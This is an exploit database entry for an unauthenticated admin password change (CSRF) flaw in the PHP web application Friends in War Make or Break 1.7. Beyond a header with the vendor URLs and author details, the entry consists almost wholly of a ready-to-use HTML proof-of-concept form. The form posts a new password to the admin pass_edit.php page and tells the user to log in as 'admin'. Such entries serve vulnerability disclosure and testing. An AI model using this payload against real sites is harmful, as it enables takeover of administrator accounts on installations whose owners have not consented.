Friends in War Make or Break 1.7 - CSRF (Change Admin Password) Vulnerability

2017-07-27T00:00:00
ID 1337DAY-ID-28198
Type zdt
Reporter shinnai
Modified 2017-07-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Friends in War Make or Break 1.7 - Unauthenticated admin password change
 
Url: http://software.friendsinwar.com/
     http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
 
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
 
PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
    <label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
    <input type="text" name="password" value="ChangeMe">
    <input type="text" name="submit" value="Edit+Password" hidden=true>
    <input type="submit" value="Submit">
</form>

#  0day.today [2018-01-03]  #